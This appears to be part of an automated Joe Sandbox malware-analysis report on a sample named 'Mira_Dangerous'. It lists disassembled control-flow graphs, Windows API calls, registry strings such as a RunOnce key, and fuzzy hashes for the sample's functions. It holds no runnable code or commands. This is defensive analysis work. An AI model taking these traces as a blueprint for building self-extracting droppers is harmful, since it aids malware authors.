control_flow_graph 445 7ff7a8cc30ec-7ff7a8cc3114 446 7ff7a8cc3141-7ff7a8cc3148 call 7ff7a8cc5fe4 445->446 447 7ff7a8cc3116-7ff7a8cc311c 445->447 455 7ff7a8cc3236 446->455 456 7ff7a8cc314e-7ff7a8cc3155 call 7ff7a8cc66c4 446->456 449 7ff7a8cc3134-7ff7a8cc313b call 7ff7a8cc3f74 447->449 450 7ff7a8cc311e call 7ff7a8cc60a4 447->450 449->446 449->455 457 7ff7a8cc3123-7ff7a8cc3125 450->457 460 7ff7a8cc3238-7ff7a8cc3258 call 7ff7a8cc8470 455->460 456->455 463 7ff7a8cc315b-7ff7a8cc319d GetSystemDirectoryA call 7ff7a8cc7ba8 LoadLibraryA 456->463 457->455 458 7ff7a8cc312b-7ff7a8cc3132 457->458 458->446 458->449 467 7ff7a8cc319f-7ff7a8cc31b8 GetProcAddress 463->467 468 7ff7a8cc31c9-7ff7a8cc31de FreeLibrary 463->468 467->468 471 7ff7a8cc31ba-7ff7a8cc31c3 DecryptFileA 467->471 469 7ff7a8cc31e4-7ff7a8cc31ea 468->469 470 7ff7a8cc3273-7ff7a8cc3288 SetCurrentDirectoryA 468->470 469->470 474 7ff7a8cc31f0-7ff7a8cc320b GetWindowsDirectoryA 469->474 472 7ff7a8cc3291-7ff7a8cc3297 470->472 473 7ff7a8cc328a-7ff7a8cc328f 470->473 471->468 476 7ff7a8cc332d-7ff7a8cc3335 472->476 477 7ff7a8cc329d-7ff7a8cc32a4 472->477 475 7ff7a8cc3212-7ff7a8cc3230 call 7ff7a8cc4dcc call 7ff7a8cc7700 473->475 478 7ff7a8cc325a-7ff7a8cc326a call 7ff7a8cc6ca4 474->478 479 7ff7a8cc320d 474->479 475->455 480 7ff7a8cc3349 476->480 481 7ff7a8cc3337-7ff7a8cc3339 476->481 482 7ff7a8cc32a9-7ff7a8cc32b7 477->482 489 7ff7a8cc326f-7ff7a8cc3271 478->489 479->475 488 7ff7a8cc334b-7ff7a8cc3359 480->488 481->480 485 7ff7a8cc333b-7ff7a8cc3342 call 7ff7a8cc2318 481->485 482->482 486 7ff7a8cc32b9-7ff7a8cc32c0 482->486 496 7ff7a8cc3347 485->496 491 7ff7a8cc32c2-7ff7a8cc32c9 486->491 492 7ff7a8cc32fb call 7ff7a8cc5d90 486->492 494 7ff7a8cc3376-7ff7a8cc337d 488->494 495 7ff7a8cc335b-7ff7a8cc3361 488->495 489->455 489->470 491->492 497 7ff7a8cc32cb-7ff7a8cc32f9 call 7ff7a8cc7ac8 491->497 505 7ff7a8cc3300 492->505 501 7ff7a8cc337f-7ff7a8cc3381 494->501 502 7ff7a8cc3388-7ff7a8cc338d 494->502 495->494 500 7ff7a8cc3363 call 7ff7a8cc40c4 495->500 496->488 509 7ff7a8cc3302 497->509 510 7ff7a8cc3368-7ff7a8cc336a 500->510 501->502 503 7ff7a8cc3383 call 7ff7a8cc494c 501->503 502->460 503->502 505->509 511 7ff7a8cc3304-7ff7a8cc330e 509->511 512 7ff7a8cc3313-7ff7a8cc3321 call 7ff7a8cc772c 509->512 510->455 513 7ff7a8cc3370 510->513 511->455 512->455 516 7ff7a8cc3327 512->516 513->494 516->476
APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
  • API String ID: 3010855178-58291647
  • Opcode ID: 318615db84064735d313a4df34e1aaf9c06dfad497c9bce78216585d7a81758b
  • Instruction ID: aee02915fc60b529dd649c25b051698cabca31caf9a46eb436d08c3e5df8bd1c
  • Opcode Fuzzy Hash: 318615db84064735d313a4df34e1aaf9c06dfad497c9bce78216585d7a81758b
  • Instruction Fuzzy Hash: 4C7141E0E0F64385FB60BB21B940376E694EF84750FC760B9D94D825B2DF2CE4458E28

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 517 7ff7a8cc64e4-7ff7a8cc6510 518 7ff7a8cc65df-7ff7a8cc65ee 517->518 519 7ff7a8cc6516-7ff7a8cc651b call 7ff7a8cc63b8 517->519 520 7ff7a8cc65f1-7ff7a8cc65fb 518->520 524 7ff7a8cc6520-7ff7a8cc6522 519->524 522 7ff7a8cc6610-7ff7a8cc661b 520->522 523 7ff7a8cc65fd-7ff7a8cc6603 520->523 528 7ff7a8cc661e-7ff7a8cc6628 call 7ff7a8cc6b70 522->528 523->522 527 7ff7a8cc6605-7ff7a8cc660e 523->527 525 7ff7a8cc6688-7ff7a8cc668a 524->525 526 7ff7a8cc6528-7ff7a8cc653e 524->526 530 7ff7a8cc6698-7ff7a8cc66bc call 7ff7a8cc8470 525->530 529 7ff7a8cc6541-7ff7a8cc654b 526->529 527->520 527->522 540 7ff7a8cc662a-7ff7a8cc663d CreateDirectoryA 528->540 541 7ff7a8cc6649-7ff7a8cc664b 528->541 532 7ff7a8cc6560-7ff7a8cc6575 529->532 533 7ff7a8cc654d-7ff7a8cc6553 529->533 537 7ff7a8cc6577-7ff7a8cc658f GetSystemInfo 532->537 538 7ff7a8cc65cc-7ff7a8cc65dd call 7ff7a8cc7ba8 532->538 533->532 536 7ff7a8cc6555-7ff7a8cc655e 533->536 536->529 536->532 543 7ff7a8cc6591-7ff7a8cc6594 537->543 544 7ff7a8cc65bb 537->544 538->528 545 7ff7a8cc663f 540->545 546 7ff7a8cc667d-7ff7a8cc6682 call 7ff7a8cc7700 540->546 547 7ff7a8cc664d-7ff7a8cc6655 call 7ff7a8cc6ca4 541->547 548 7ff7a8cc668c-7ff7a8cc6693 541->548 551 7ff7a8cc65b2-7ff7a8cc65b9 543->551 552 7ff7a8cc6596-7ff7a8cc6599 543->552 553 7ff7a8cc65c2-7ff7a8cc65c7 call 7ff7a8cc7ba8 544->553 545->541 546->525 559 7ff7a8cc665a-7ff7a8cc665c 547->559 548->530 551->553 556 7ff7a8cc65a9-7ff7a8cc65b0 552->556 557 7ff7a8cc659b-7ff7a8cc659e 552->557 553->538 556->553 557->538 561 7ff7a8cc65a0-7ff7a8cc65a7 557->561 559->548 560 7ff7a8cc665e-7ff7a8cc6664 559->560 560->525 562 7ff7a8cc6666-7ff7a8cc667b RemoveDirectoryA 560->562 561->553 562->525
APIs
  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7A8CC2CE1), ref: 00007FF7A8CC657C
  • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7A8CC2CE1), ref: 00007FF7A8CC662F
  • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7A8CC2CE1), ref: 00007FF7A8CC666F
    • Part of subcall function 00007FF7A8CC63B8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF7A8CC2CE1), ref: 00007FF7A8CC6423
    • Part of subcall function 00007FF7A8CC63B8: GetFileAttributesA.KERNELBASE ref: 00007FF7A8CC6432
    • Part of subcall function 00007FF7A8CC63B8: GetTempFileNameA.KERNEL32 ref: 00007FF7A8CC645B
    • Part of subcall function 00007FF7A8CC63B8: DeleteFileA.KERNEL32 ref: 00007FF7A8CC6473
    • Part of subcall function 00007FF7A8CC63B8: CreateDirectoryA.KERNEL32 ref: 00007FF7A8CC6484
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
  • API String ID: 1979080616-186922987
  • Opcode ID: 7d4d860df232b0db62657ebb5dc88ca939e84df122defa6df573680caeaa5849
  • Instruction ID: fc3e2d1129bcba490da25f33f54312d12262aa2cb513cf46001ab79e04d63763
  • Opcode Fuzzy Hash: 7d4d860df232b0db62657ebb5dc88ca939e84df122defa6df573680caeaa5849
  • Instruction Fuzzy Hash: 495184F1E0F64281FB50AB2599106B5E7A0AF44740FDA60B9D94E437B5DF3CE409CB28

Control-flow Graph

APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Handle$AddressCloseExitModuleProcVersionWindows
  • String ID: @$HeapSetInformation$Kernel32.dll
  • API String ID: 1302179841-1204263913
  • Opcode ID: 91cf7217d730e16829238764ce0eddd89ffa8fd2b17e338e81c8c80914c49845
  • Instruction ID: b59f52ee25d2458b07a3d19e6730e4f4aff17bbed604b498958b990c81317ebe
  • Opcode Fuzzy Hash: 91cf7217d730e16829238764ce0eddd89ffa8fd2b17e338e81c8c80914c49845
  • Instruction Fuzzy Hash: BF3152F1E0A64286FB607B20A440275F690AF65B40FC661B5DA4D436B9EF7CE444CE28
APIs
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
  • String ID:
  • API String ID: 836429354-0
  • Opcode ID: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
  • Instruction ID: ee267cb2025963ed77fdcf9595248aafa378f932eb440bdc9b6d95b63585b6a0
  • Opcode Fuzzy Hash: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
  • Instruction Fuzzy Hash: 685182B261AB81C5EB11AF20E8402F8F7A1FB45B84FC591B1DA4D036A4DF3CD909CB14

Control-flow Graph

APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
  • API String ID: 3049360512-2202052387
  • Opcode ID: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
  • Instruction ID: 4e2ba8621a5b201c6cda13e1c0175b6497c2622a4f59b99c22dad3509d079754
  • Opcode Fuzzy Hash: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
  • Instruction Fuzzy Hash: 4F5142B1A0A642C6EB10AB14E4447B9F7A0FB45745FCA61B5D64D437B0CF3CE409CB28

Control-flow Graph

APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
  • String ID: Mira$rce.
  • API String ID: 2929476258-3314896916
  • Opcode ID: d01d15b3b6bc5348d8e1e4290b799411aa9174f53e9f7f21c0e7d225e718463d
  • Instruction ID: d03b86906ceabf8130b8e2712f78292cca178c9795cd17eddebb6044f621e1c4
  • Opcode Fuzzy Hash: d01d15b3b6bc5348d8e1e4290b799411aa9174f53e9f7f21c0e7d225e718463d
  • Instruction Fuzzy Hash: E761E8A1E0A7C186FB11AB25A4003B5EA90FF59754F8662B0DE4D437E1DF3CE585CB24

Control-flow Graph

APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
  • String ID:
  • API String ID: 3183975587-3916222277
  • Opcode ID: e21b509cffe8503fd7179222637d6c67e2ff5f5646c012befc4f1d87719c6888
  • Instruction ID: 43475e60e4898c9a2a72a77b6376a99ad7049755fdfd7dfa0e1f7a4d57a4b88f
  • Opcode Fuzzy Hash: e21b509cffe8503fd7179222637d6c67e2ff5f5646c012befc4f1d87719c6888
  • Instruction Fuzzy Hash: 1151C5B290A681C6F760AF10E444379FBA0FB88755F86A175EA4D826B4CF7CD444CF28

Control-flow Graph

APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: OpenQuery$CloseInfoValue
  • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
  • API String ID: 2209512893-559176071
  • Opcode ID: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
  • Instruction ID: 2862ee1e1f99dedf817a4c258d7ce58c2008bec3bf3af0c3428a0fd94fe7f115
  • Opcode Fuzzy Hash: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
  • Instruction Fuzzy Hash: 19318E72A08B41CBD720AF25E8406A9F7A4FB88754F856675EA8D43F64DF38D054CF14

Control-flow Graph

APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
  • String ID: IXP$IXP%03d.TMP
  • API String ID: 1082909758-3932986939
  • Opcode ID: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
  • Instruction ID: b489f1cc0284eb1947f1d38f62502bbc884356897084cdd255894f0c7755e405
  • Opcode Fuzzy Hash: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
  • Instruction Fuzzy Hash: E72173B160994186E710AB12E9503F9F651FB8DB81FC6A170DD4E477B1CF3CD44ACA14

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 651 7ff7a8cc8200-7ff7a8cc8249 call 7ff7a8cc8964 GetStartupInfoW 655 7ff7a8cc824b-7ff7a8cc8256 651->655 656 7ff7a8cc8262-7ff7a8cc826b 655->656 657 7ff7a8cc8258-7ff7a8cc825b 655->657 660 7ff7a8cc8284-7ff7a8cc828c 656->660 661 7ff7a8cc826d-7ff7a8cc8275 _amsg_exit 656->661 658 7ff7a8cc825d 657->658 659 7ff7a8cc8277-7ff7a8cc8282 Sleep 657->659 658->656 659->655 663 7ff7a8cc828e-7ff7a8cc82ab 660->663 664 7ff7a8cc82e7 660->664 662 7ff7a8cc82f1-7ff7a8cc82fa 661->662 665 7ff7a8cc82fc-7ff7a8cc830f _initterm 662->665 666 7ff7a8cc8319-7ff7a8cc831b 662->666 667 7ff7a8cc82af-7ff7a8cc82b2 663->667 664->662 665->666 668 7ff7a8cc8326-7ff7a8cc832e 666->668 669 7ff7a8cc831d-7ff7a8cc831f 666->669 670 7ff7a8cc82b4-7ff7a8cc82b6 667->670 671 7ff7a8cc82d9-7ff7a8cc82db 667->671 673 7ff7a8cc8330-7ff7a8cc833e call 7ff7a8cc88d0 668->673 674 7ff7a8cc835a-7ff7a8cc8369 668->674 669->668 672 7ff7a8cc82dd-7ff7a8cc82e2 670->672 675 7ff7a8cc82b8-7ff7a8cc82bc 670->675 671->662 671->672 676 7ff7a8cc8444-7ff7a8cc8459 672->676 673->674 684 7ff7a8cc8340-7ff7a8cc8350 673->684 680 7ff7a8cc836d-7ff7a8cc8373 674->680 678 7ff7a8cc82ce-7ff7a8cc82d7 675->678 679 7ff7a8cc82be-7ff7a8cc82ca 675->679 678->667 679->678 682 7ff7a8cc8375-7ff7a8cc8377 680->682 683 7ff7a8cc83e6-7ff7a8cc83e9 680->683 688 7ff7a8cc837d-7ff7a8cc8382 682->688 689 7ff7a8cc8379-7ff7a8cc837b 682->689 685 7ff7a8cc83eb-7ff7a8cc83f4 683->685 686 7ff7a8cc83f8-7ff7a8cc8400 _ismbblead 683->686 684->674 685->686 692 7ff7a8cc8402-7ff7a8cc8405 686->692 693 7ff7a8cc840a-7ff7a8cc8412 686->693 690 7ff7a8cc8384-7ff7a8cc838e 688->690 691 7ff7a8cc8390-7ff7a8cc83c5 call 7ff7a8cc2c54 688->691 689->683 689->688 690->688 696 7ff7a8cc83cf-7ff7a8cc83d6 691->696 697 7ff7a8cc83c7-7ff7a8cc83c9 exit 691->697 692->693 693->680 698 7ff7a8cc83e4 696->698 699 7ff7a8cc83d8-7ff7a8cc83de _cexit 696->699 697->696 698->676 699->698
APIs
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
  • String ID:
  • API String ID: 2995914023-0
  • Opcode ID: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
  • Instruction ID: 249d329a2f932d521fddb8cd848f2755645102d2b5e7050e2a8a3b934d76c245
  • Opcode Fuzzy Hash: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
  • Instruction Fuzzy Hash: 0B5183B190E64286F7A0AB60E854376E7A0FB44755FC630B1D94D826B0DF3CE655CF28
APIs
    • Part of subcall function 00007FF7A8CC5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC5078
    • Part of subcall function 00007FF7A8CC5050: SizeofResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC5089
    • Part of subcall function 00007FF7A8CC5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50AF
    • Part of subcall function 00007FF7A8CC5050: LoadResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50C0
    • Part of subcall function 00007FF7A8CC5050: LockResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50CF
    • Part of subcall function 00007FF7A8CC5050: memcpy_s.MSVCRT ref: 00007FF7A8CC50EE
    • Part of subcall function 00007FF7A8CC5050: FreeResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50FD
  • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF7A8CC3123), ref: 00007FF7A8CC60C9
  • LocalFree.KERNEL32 ref: 00007FF7A8CC6142
    • Part of subcall function 00007FF7A8CC4DCC: LoadStringA.USER32 ref: 00007FF7A8CC4E60
    • Part of subcall function 00007FF7A8CC4DCC: MessageBoxA.USER32 ref: 00007FF7A8CC4EA0
    • Part of subcall function 00007FF7A8CC7700: GetLastError.KERNEL32 ref: 00007FF7A8CC7704
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
  • String ID: $<None>$UPROMPT
  • API String ID: 957408736-2569542085
  • Opcode ID: 7abbca11000329c2f37ab55ab60ccce920bf3b4aa4237eb4f55f589dacc1068b
  • Instruction ID: 1fc3b39e237bb40b7a402f6638e8a8d1d71cba515432cc1ff13e0ce01c59b540
  • Opcode Fuzzy Hash: 7abbca11000329c2f37ab55ab60ccce920bf3b4aa4237eb4f55f589dacc1068b
  • Instruction Fuzzy Hash: 1C3185F1E0A24287F7207B60E55077AFA61FB85745F82A1B8DA0E42AA1DF7DD0048F18
APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: CreateFile$lstrcmp
  • String ID: *MEMCAB
  • API String ID: 1301100335-3211172518
  • Opcode ID: 1554ed486bc7cac90ef3253e660ad31e834894ade489ea310015c337a2cd6deb
  • Instruction ID: b078a1fb87168d539c26e00813a1ef9c163f94d5a04cdcb31ef0776c327bef3d
  • Opcode Fuzzy Hash: 1554ed486bc7cac90ef3253e660ad31e834894ade489ea310015c337a2cd6deb
  • Instruction Fuzzy Hash: 8961D9F2909B4186F7609B14A480379FA91F745B75F8663B1DA6E027E0CF3CE0458F28
APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: FileTime$AttributesDateItemLocalText
  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
  • API String ID: 851750970-2312194364
  • Opcode ID: 94d827d004676d0e23b6a3eaf0944199c835ba76f01473357c705151827b719a
  • Instruction ID: 9ecd082f8f15b391698e7c8b4a4baefd96a24939a3e9cf68a7dfa5384d3f469c
  • Opcode Fuzzy Hash: 94d827d004676d0e23b6a3eaf0944199c835ba76f01473357c705151827b719a
  • Instruction Fuzzy Hash: 2A51D8B2A1EA4281EB50AB12D4401BDE790FB48B91FC661B1DA4E436B5CE3CE545CB68
APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: AllocLocal
